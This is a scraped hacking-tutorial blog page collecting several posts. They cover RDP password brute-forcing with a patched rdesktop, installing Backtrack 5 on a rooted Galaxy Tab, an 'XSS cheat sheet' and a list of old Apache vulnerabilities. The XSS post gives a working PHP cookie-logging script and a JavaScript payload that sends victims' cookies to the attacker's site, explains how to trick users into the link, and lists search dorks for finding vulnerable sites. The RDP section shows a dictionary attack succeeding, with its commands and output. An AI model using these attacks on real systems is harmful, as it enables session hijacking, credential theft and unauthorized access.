patching file xkeymap.c</span> <br /> compile and install rdesktop:<br /> <span style="font-family: "courier new" , "courier" , "mono";">./configure<br /> make<br /> sudo make instal</span>l <br /> Start X-Windows/X-Darwin/X11(I used X-Darwin installed using fink using Mac OS X Tiger). Shouldn't be an issue if you are using an linux flavor with a GUI. <br /> Now start Rdesktop with your passlist and user or userlist: <br /> <span style="font-family: "courier new" , "courier" , "mono";">SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u administrator -p pass.txt <a href="tel:192.168.0.105" target="_blank" value="+911921680105">192.168.0.105</a></span> <br /> **you'll need to run this from X-Darwin/X-Windows/X-11, if you run it from the command line it will say something like: <br /> <span style="font-family: "courier new" , "courier" , "mono";">ERROR: Failed to open display: </span> <br /> If everything is working right you'll see it opening the Rdesktop trying to log in and then exiting. Check your command line output to see if you were able to guess the password. <br />   <br /> Figure 4.1: Running Rdesktop with no parameters gives you the help menu. <br />   <br /> Figure 4.2: Issuing the command line parameters to start Rdestop in *nix in XDarwin. <br /> <br /> Figure 4.3: Rdestop brute forcing the accounts. <br /> The following output was against an XP Pro SP2 host. With XP if the user is currently logged in, they will be forced to log off if you connect to the machine over RDP. <br /> <span style="font-family: "courier new" , "courier" , "mono";">SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u noone -p pass.txt <a href="tel:192.168.0.105" target="_blank" value="+911921680105">192.168.0.105</a></span> <br /> <span style="font-family: "courier new" , "courier" , "mono";">Starting dictionary attack against server <a href="tel:192.168.0.105" target="_blank" value="+911921680105">192.168.0.105</a><br /> -------------------------------------------------------<br /> Retrieved connection termination packet.<br /> Account credentials are NOT valid.<br /> Retrieved connection termination packet.<br /> [failure] User "noone" Password "test"<br /> Retrieved connection termination packet.<br /> Account credentials are NOT valid.<br /> Retrieved connection termination packet.<br /> ---SNIP---<br /> [failure] User "noone" Password "admin"<br /> Retrieved connection termination packet.<br /> Account credentials are NOT valid.<br /> Retrieved connection termination packet.<br /> [failure] User "noone" Password "administrator"<br /> Valid credentials, however, another user is currently logged on.<br /> [success] User "noone" Password "noone"<br /> SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ </span> <br />   <br /> Figure 4.4: The command line output of the successful attack against XP SP2 but with the user logged in. <br /> Let's see Rdesktop against a Windows Server 2003. <br /> <br /> Figure 4.5: Rdesktop against Windows Server 2003 against the "chris" account. <br /> <br /> Figure 4.6: Rdesktop successfully cracking the password with a dictionary attack.</div>

Hacking Hacking Tutorials Server Tutorials Tutorial on How to Hack Terminal Services

If you want to do any MS Terminal Server cracking you basically have your choice of three tools that can do it for you; TSgrinder, TScrac...

Read more »

Install Backtrack 5 On Samsung Galaxy Tab

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhggrX7gsNFCquys849k4w921e7vHUQvt4zX0gXR1YZM7UjLHPfnCriTC5ZSLJpqggMASD-8eJY_6Hc90OKCQMAtBkGWzIFlnLXcFFUW2_DAUNTMdlc4P2o74MVqYGtjO4w8psV-6VSSY6O/s1600/IMG_7595-768608.jpg"><img alt="Install Backtrack 5 On Samsung Galaxy Tab" border="0" id="BLOGGER_PHOTO_ID_5681247311530902882" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhggrX7gsNFCquys849k4w921e7vHUQvt4zX0gXR1YZM7UjLHPfnCriTC5ZSLJpqggMASD-8eJY_6Hc90OKCQMAtBkGWzIFlnLXcFFUW2_DAUNTMdlc4P2o74MVqYGtjO4w8psV-6VSSY6O/s320/IMG_7595-768608.jpg" title="Install Backtrack 5 On Samsung Galaxy Tab" /></a></div> <br /> First thing after I get Samsung Galaxy Tab 10.1 is how can I change or add some feature about penetration testing to my Tab. So after I read "How to install Backtrack5 on Motorola Xoom by Pual[.]com, I think I can install Backtrack 5 in my Tab too. That's it. I create this tutorial after I'm successful to installing Backtrack 5 on my Tab. But please do all the steps with you risk!!!!.<br /> 1. Download <a href="http://forum.xda-developers.com/attachment.php?attachmentid=593613&d=1305168395" target="_blank">rooting file</a> and transfer it to the tab.<br /> 2. Go into the recovery mode with hold "Power Button and Low Volumn Button" for rebooting and when you see the 2 icon press "Low Volumn" and press "High Volumn" or "Power Button" for go to recovery mode.<br /> 3. Choose "apply the update from sdcard" and choose "rooting file"<br /> After this step, you're tab was rooted now.<br /> 4. Download requirement files<br /> - <a href="http://www.megaupload.com/?d=S6HSZL8H" target="_blank">P7500DXKH4_P7500OLBKH1_P7500XWKG1_HOME.tar.MD5</a><br /> - <a href="http://www.multiupload.com/5RMKLEFCTA" target="_blank">001001-P7500_KI1_Restock.zip</a><br /> - <a href="http://www.multiupload.com/CRBRV18830" target="_blank">001003-Overcome_10.1_Series_v1.1.0_P7500_Full.zip</a><br /> - <a href="http://www.multiupload.com/REAMDK5J7U" target="_blank">002001-Overcome_CWM_Recovery_v4.1.1.5.tar</a><br /> - <a href="http://droidbasement.com/galaxy/kernels/2636/20/p4-ux/boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip" target="_blank">Overclock Kernel </a><br /> *** you can change Overcome_10.1_Series_v1.1.0_P7500_Full.zip to another Custom ROM just like Starburt or something like that.<br /> 5. Extract<br /> <div class="system"> 001001-P7500_KI1_Restock.zip</div> 6. Go into the recovery mode with hold "Power Button and Low Volumn Button" for rebooting and when you see the 2 icon press "High Volumn" or "Power Button" for go to download mode.<br /> 7. Open Odin3_v1.85 and click PDA -> P7500OXAKI1_P7500XXKI1_P7500XXKI1_HOME.tar.MD5 -> start<br /> The tab will restart after this step is done.<br /> 8. Copy file Overcome_10.1_Series_v1.1.0_P7500_Full.zip and boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip to the tab<br /> 9. Go to the download mode again.<br /> 10. In the Odin, click PDA -> Overcome_CWM_Recovery_v4.1.1.5.tar -> start<br /> 11. Go to the recovery mode<br /> 12. Go to install menu -> choose zip from internal storage with data wipe -> Overcome_10.1_Series_v1.1.0_P7500_Full.zip -> install menu -> choose zip from internal storage -> boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip<br /> 13. Now you're root and get the new custom ROM. So install Android SDK and download Backtrack5 ARM version.<br /> - <a href="http://developer.android.com/sdk/index.html#top" target="_blank">Android SDK </a><br /> - <a href="http://www.backtrack-linux.org/downloads/" target="_blank">Backtrack 5 ARM</a><br /> 14. Copy Backtrack into your tab or use the adb for install busybox and upload Backtrack into the tab.<br /> <div class="command wobble-horizontal "> <code class="prettyprint"> Go to C:\Program Files\Android\android-sdk\platform-tools<br /> adb.exe shell<br /> mkdir /sdcard/BT5<br /> exit<br /> adb.exe push busybox /sdcard/<br /> adb.exe push installbusybox.sh /sdcard<br /> adb.exe push fsrw /sdcard/BT5/<br /> adb.exe push mountonly /sdcard/BT5/<br /> adb.exe push bootbt /sdcard/BT5/<br /> adb.exe push bt5.img.gz /sdcard/BT5/<br /> adb.exe push unionfs /sdcard/BT5/<br /> </code></div> <br /> ***If you use SSHDroid to enable SSHD in your tab.[Default SSH User: root and Password: admin]<br /> 15. Go to the terminal of Tab with ConnectBot and choose local to connect in your Tab. I don't know you can use sshd to complete this step or not but you can try it for easy typing.<br /> 16. Remove the Tab from PC.<br /> 17. Go to /sdcard/BT5 and unzip bt5.img.gz<br /> <div class="command wobble-horizontal "> <code class="prettyprint">cd /sdcard/BT5<br /> gunzip bt5.img.gz</code></div> <br /> 18. Start BT5<br /> <div class="command wobble-horizontal "> <code class="prettyprint">sh bootbt</code></div> <br /> 19. So now you're in the chroot of Backtrack5<br /> <div class="command wobble-horizontal "> <code class="prettyprint"> net.ipv4.ip_forward = 1<br /> ls /pentest/<br /> backdoors databaseexploits passwords scanners stressing voip<br /> cisco enumeration forensics pythonsniffers tunneling web</code></div> <br /> 20. Run the startvnc<br /> <div class="command wobble-horizontal "> <code class="prettyprint">startvnc</code></div> <br /> *** You can change resolution of vnc with nano /usr/bin/startvnc<br /> 21. Now vnc is running, you can check what is the port number that was use by vnc with<br /> <div class="command wobble-horizontal "> <code class="prettyprint">netstat -napt</code></div> <br /> 21. Now you can connect vnc server with androidVNC or whatever that you can find in the Android Market.<br /> *** Default password of vnc server is "toortoor"<br /> 22. Finally you can do anything that you can do in Backtrack5 on your Tab, have a nice hack<br /> <div dir="ltr"> </div> </div>

Backtrack Hacking Hacking Tutorials Linux OS Tricks Tutorials Install Backtrack 5 On Samsung Galaxy Tab

First thing after I get Samsung Galaxy Tab 10.1 is how can I change or add some feature about penetration testing to my Tab. So after I ...

Read more »

XSS cheat sheet

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6EdeQi9ETgI42fZ4kls4ni867ROiNB5N22o0sDG3nk_P_X9dvjx_dhAnIeoWkpMNLKUV9mHsBAg94MIK7uyXKurlxp5OT87jo_QoYG56QxClr2FuDJloiC6rDyObG92ZWsdQImNXy2MF/s1600/xss-threat3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6EdeQi9ETgI42fZ4kls4ni867ROiNB5N22o0sDG3nk_P_X9dvjx_dhAnIeoWkpMNLKUV9mHsBAg94MIK7uyXKurlxp5OT87jo_QoYG56QxClr2FuDJloiC6rDyObG92ZWsdQImNXy2MF/s1600/xss-threat3.jpg" /></a></div><br /> Before we start <span style="color: mediumblue;">what is XSS?</span> let's come to basic !! hmm what is <span style="color: darkgreen;">cookie</span> , don't say something like eating stuff.<br /> <span style="color: darkgreen;"><span style="font-weight: bold;">COOKIE</span></span>: <br /> <div class="define border-fade">A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.</div><span style="color: purple;"><span style="font-weight: bold;">CROSS SITE SCRIPTING</span></span>: <br /> <div class="define border-fade">Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.</div><br /> SOME POINTS ON XSS :<br /> <blockquote>@ -XSS attacks almost always focus upon sites which use cookies for storing our username and password.<br /> @-XSS is used to harm the website (may be defacing ).</blockquote><span style="font-style: italic;">tRAdiTIOnAL Type$</span>: <span style="color: mediumblue;">type0</span> , <span style="color: darkslateblue;">type1</span>, <span style="color: mediumvioletred;">type2</span><br /> <span style="color: mediumblue;">type 0 =DOM-based</span>:<br /> <br /> <div class="spoiler_body" style="display: block;">DOM-based is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the slave’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.</div><br /> <span style="color: darkslateblue;">type 1 = Non Persistence</span> :<br /> <br /> <div class="spoiler_body" style="display: block;">It means that the injected code is not permanent and is for small time till the user is on page or having the url with malicious code.</div><span style="color: mediumvioletred;">type 2 = Persistence</span> :<br /> <br /> <div class="spoiler_body" style="display: block;">It means that the injected code is permanent and will stay on the site and output can be seen by any user of site.</div><br /> Now the question is how to check whether the site is xss vulnerable or not ?<br /> There are two methods to check this:<br /> <br /> <h3>1.POST:: </h3><a href="http://www.target.com/search.php" target="_blank">http://www.target.com/search.php</a> ( we put malacious code in search engine)<br /> <div class="program glow"><pre><code class="prettyprint"><script>alert(“xss”);</script></code></pre></div><br /> <h3>2.GET :</h3><div class="heightlight">http://www.target.com/search=<script>alert(</a>"xss");</script></div>We directly put the script in url of browser<br /> <br /> <span style="color: mediumvioletred;"> </span>what else we can do ..??<br /> --><span style="text-decoration: underline;">Insert image</span>:<br /> <div class="program glow"><pre><code class="prettyprint"><img src=“url of the image”></img></code></pre></div>--><span style="text-decoration: underline;">Insert message</span>:<br /> <div class="program glow"><code class="prettyprint"><b>this is hacked </b></code></div>--><span style="text-decoration: underline;">Redirect to your page</span> :<br /> <div class="program glow"><code class="prettyprint"><script>window.open( "http://www.yoursite.com/" )</script></code></div><br /> But main aim of xss is to steal cookies so here is cookie stealing.<br /> COOKIE STEALING TUTORIAL:<br /> <div class="program glow"><code class="prettyprint"><br /> <?php<br /> <br /> function GetIP()<br /> {<br />     if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))<br />         $ip = getenv("HTTP_CLIENT_IP");<br />     else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))<br />         $ip = getenv("HTTP_X_FORWARDED_FOR");<br />     else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))<br />         $ip = getenv("REMOTE_ADDR");<br />     else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))<br />         $ip = $_SERVER['REMOTE_ADDR'];<br />     else<br />         $ip = "unknown";<br />     return($ip);<br /> }<br /> <br /> function logData()<br /> {<br />     $ipLog="log.txt";<br />     $cookie = $_SERVER['QUERY_STRING'];<br />     $register_globals = (bool) ini_get('register_gobals');<br />     if ($register_globals) $ip = getenv('REMOTE_ADDR');<br />     else $ip = GetIP();<br /> <br />     $rem_port = $_SERVER['REMOTE_PORT'];<br />     $user_agent = $_SERVER['HTTP_USER_AGENT'];<br />     $rqst_method = $_SERVER['METHOD'];<br />     $rem_host = $_SERVER['REMOTE_HOST'];<br />     $referer = $_SERVER['HTTP_REFERER'];<br />     $date=date ("l dS of F Y h:i:s A");<br />     $log=fopen("$ipLog", "a+");<br /> <br />     if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))<br />         fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");<br />     else<br />         fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");<br />     fclose($log);<br /> }<br /> <br /> logData();<br /> <br /> ?></code></div><br /> now how to use this code???<br /> This is done by three-step process consisting of the injected script, the cookie recorder, and the log file.<br /> <br /> First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (give your name.php) [code metion above].<br /> above script will record the cookies of every user that views it.<br /> <div class="program glow"><pre><code class="prettyprint"><script language= "JavaScript"> document.location="http://yoursite.com/giveyourname.php?cookie=" + document.cookie;document.location="http://www.whateversite.com" </script> </code></pre></div>now above code is injected to the xss vulnerable site page via get or post method: what does this code do??<br /> The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.<br /> <br /> <br /> If this code works then you'll automatically gets the cookie in yoursite, other wise you have to do some hard work !! grab the link which you get after the insertion of above script. And manually get someone to use that link if necessary. o0ps all s done at this point.<br /> <br /> ##All you need to do now is go to your website and check the<span style="color: maroon;"><span style="font-weight: bold;"> log file</span></span><br /> <br /> YOU CAN TRY TO LOOK HERE =<br /> <div class="content shadow-radial">SEARCH BOX<br /> SHOUT BOX<br /> BLOGS<br /> COMMENT BOX<br /> LOGIN BOX<br /> FEEDBACK FORMS</div><br /> Hey there are still so many xss vulnerable sites , the thing is you should spent maximum time on internet in search for them:<br /> here are few dorks for you:<br /> <div class="content shadow-radial">inurl:search.php?q=<br /> inurl:com_feedpostold/feedpost.php?url=<br /> inurl:scrapbook.php?id=<br /> inurl:headersearch.php?sid=<br /> inurl:/poll/default.asp?catid=<br /> inurl:/search_results.php?search=<br /> /preaspjobboard//Employee/emp_login.asp?msg1=<br /> pages/match_report.php?mid= pages/match_report.php?mid=<br /> inurl:?msg=</div></div>

Hacking Hacking Tutorials Tutorials Vulnerability XSS XSS cheat sheet

Before we start what is XSS? let's come to basic !! hmm what is cookie , don't say something like eating stuff. COOKIE : A cook...

Read more »

Hack Apache based Web Servers

<div dir="ltr" style="text-align: left;" trbidi="on"> <div style="text-align: justify;"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"></span><br /> <div class="separator" style="clear: both; text-align: center;"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvCx-rmtWhaBWR7HocptgDvTugMFlLWJqKKU-dxLrqom7lEgGqVrEPKLF8rMK7pX8pWGjl-YncFF7zftBqzd8P0_8-k7pOZqtSIxm0nWSoMlBvhpMDjpIdJpW8Utt3aU01_WLiuTPNFAE/s1600/apache_vulnerability_dos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvCx-rmtWhaBWR7HocptgDvTugMFlLWJqKKU-dxLrqom7lEgGqVrEPKLF8rMK7pX8pWGjl-YncFF7zftBqzd8P0_8-k7pOZqtSIxm0nWSoMlBvhpMDjpIdJpW8Utt3aU01_WLiuTPNFAE/s1600/apache_vulnerability_dos.png" /></a></span></div> <h3 class="post-title entry-title" style="color: #444444; font-family: "Arial", "Tahoma", "Helvetica", "FreeSans", sans-serif; font-size: 22px; font-style: normal; font-variant: normal; font-weight: 700; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; position: relative;"> </h3> <h3 class="post-title entry-title" style="color: #444444; font-family: "Arial", "Tahoma", "Helvetica", "FreeSans", sans-serif; font-size: 22px; font-style: normal; font-variant: normal; font-weight: 700; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; position: relative;"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;">Apache Vulnerability: Hack Apache based Web Servers</span></h3> <div class="post-header" style="line-height: 1.6; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> <div class="post-header-line-1"> </div> </div> <div class="post-body entry-content" style="line-height: 1.4; position: relative; width: 506px;"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"></span></span><br /> <div> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><span class="sidebar-title"><b></b></span></span></span><br /> <center> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><span class="sidebar-title"><b>Apache Vulnerability</b></span></span></span></center> <br /> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><br /></span></span> <br /> <ul class="itemizedlist" style="line-height: 1.4; list-style-type: disc; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px;"> <li class="first-listitem" style="border-bottom-color: transparent; border-bottom-style: none; border-bottom-width: 1px; border-left-style: none; border-right-style: none; border-top-style: none; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"><span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"> <div class="first-para"> The Apache Week tracks the vulnerabilities in Apache Server. Even Apache  has its share of bugs and fixes.</div> </span></span></li> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"> <li class="listitem" style="border-bottom-style: none; border-left-style: none; border-right-style: none; border-top-color: rgb(238, 238, 238); border-top-style: none; border-top-width: 1px; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"> <div class="first-para"> For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20.</div> <ul class="simple-list" style="line-height: 1.4; list-style-type: disc; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px;"> <li class="first-listitem" style="border-bottom-style: none; border-left-style: none; border-right-style: none; border-top-style: none; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"> <div class="first-para"> Long URLs passing through the mod_negative, mod_dir and mode_autoindex modules could cause Apache to list directory contents.</div> </li> </ul> <ul class="itemizedlist" style="line-height: 1.4; list-style-type: disc; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px;"> <li class="first-listitem" style="border-bottom-color: transparent; border-bottom-style: none; border-bottom-width: 1px; border-left-style: none; border-right-style: none; border-top-style: none; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"> <div class="first-para"> The concept is simple but requires a few trial runs.</div> </li> <li class="listitem" style="border-bottom-style: none; border-left-style: none; border-right-style: none; border-top-color: rgb(238, 238, 238); border-top-style: none; border-top-width: 1px; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"> <div class="first-para"> A URL with a large number of trailing slashes:</div> <ul class="simple-list" style="line-height: 1.4; list-style-type: disc; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px;"> <li class="first-listitem" style="border-bottom-style: none; border-left-style: none; border-right-style: none; border-top-style: none; color: #444444; margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.25em; padding-left: 0px; padding-right: 0px; padding-top: 0.25em; text-indent: 0px;"> <div class="first-para"> /cgi-bin /////////////////////////// / could produce directory listing of the original directory.</div> </li> </ul> </li> </ul> </li> </span></span></ul> </div> <table border="0" cellpadding="0" cellspacing="0" class="BlankSpace"><tbody> <tr><td height="16"></td></tr> </tbody></table> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231">The purpose of discussing the various vulnerabilities of the web server here is to highlight how ingenious attackers can be in exploring the functionality of the various components that they are able to elicit an unexpected and previously unknown behavior of a piece of code. No matter how insignificant it is, a security breach can have far reaching implications if left unattended.</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231">This is not the only issue in focus. The possibility of eliminating flawed coding practices and incorporating proper testing must not be ignored as security measures.</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231">The Apache Week tracks the vulnerabilities in Apache Server. For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20. Because of this, a client submitting a very long URI could cause a directory listing to be returned rather than the default index page. This was subsequently fixed in Apache httpd 1.3.22</span></span><br /> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><br /></span></span></div> <table border="0" cellpadding="0" cellspacing="0" class="note"><tbody> <tr><td class="admon-check" valign="top"></td><td class="admon-title" valign="top" width="56"><b>Threat</b></td><td class="admon-body" valign="top"><div class="first-para"> <b>Some of the other vulnerabilities have been:</b></div> </td></tr> </tbody></table> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Remote DoS via IPv6</i>: When a client requests that proxy ftp connect to an ftp server with IPv6 address, and the proxy is unable to create an IPv6 socket, an infinite loop occurs causing a remote Denial of Service. This has been fixed in Apache httpd 2.0.47</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Remote DoS with multiple Listen directives</i>: In a server with multiple listening sockets a certain error returned by accept () on a rarely access port can cause a temporary denial of service, due to a bug in the prefork MPM. This has been fixed in Apache httpd 2.0.47</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">APR remote crash</i>: A vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors. This has been fixed in Apache httpd 2.0.46</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Basic Authentication DoS</i>: A build system problem in Apache 2.0.40 through 2.0.45 allows remote attackers to cause a denial of access to authenticated content when a threaded server is used. This has been fixed in Apache httpd 2.0.46</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Line feed memory leak DoS</i>: Apache 2.0 versions before Apache 2.0.45 have a significant Denial of Service vulnerability. Remote attackers can cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed. This has been fixed in Apache httpd 2.0.45</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">MSDOS device names cause DoS</i>: Apache versions before 2.0.44 on Windows do not correctly filter MS-DOS device names which can lead to denial of service attacks and remote code execution. This has been fixed in Apache httpd 2.0.44</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Apache can serve unexpected files</i>: On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL. This has been fixed in Apache httpd 2.0.44</span></span></div> <div class="para"> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="6923457550510159231"><i class="emphasis">Rewrite rules that include references allow access to any file</i>: The Rewrite module, mod_rewrite, can allow access to any file on the web server. The vulnerability occurs only with certain specific cases of using regular expression references in Rewrite Rule directives: If the destination of a Rewrite Rule contains regular expression references then an attacker will be able to access any file on the server. This has been fixed in Apache httpd 1.3.14</span></span></div> </div> </div> <div style="text-align: justify;"> <br /></div> <br /></div>

Apache DOS Hacking Hacking Tutorials Linux Tutorials Server Tutorials Vulnerability Hack Apache based Web Servers

Apache Vulnerability: Hack Apache based Web Servers Apache Vulnerability The Apache Week tracks the vulnerabilitie...

Read more »

Popular Web Servers : Hacking Web Servers

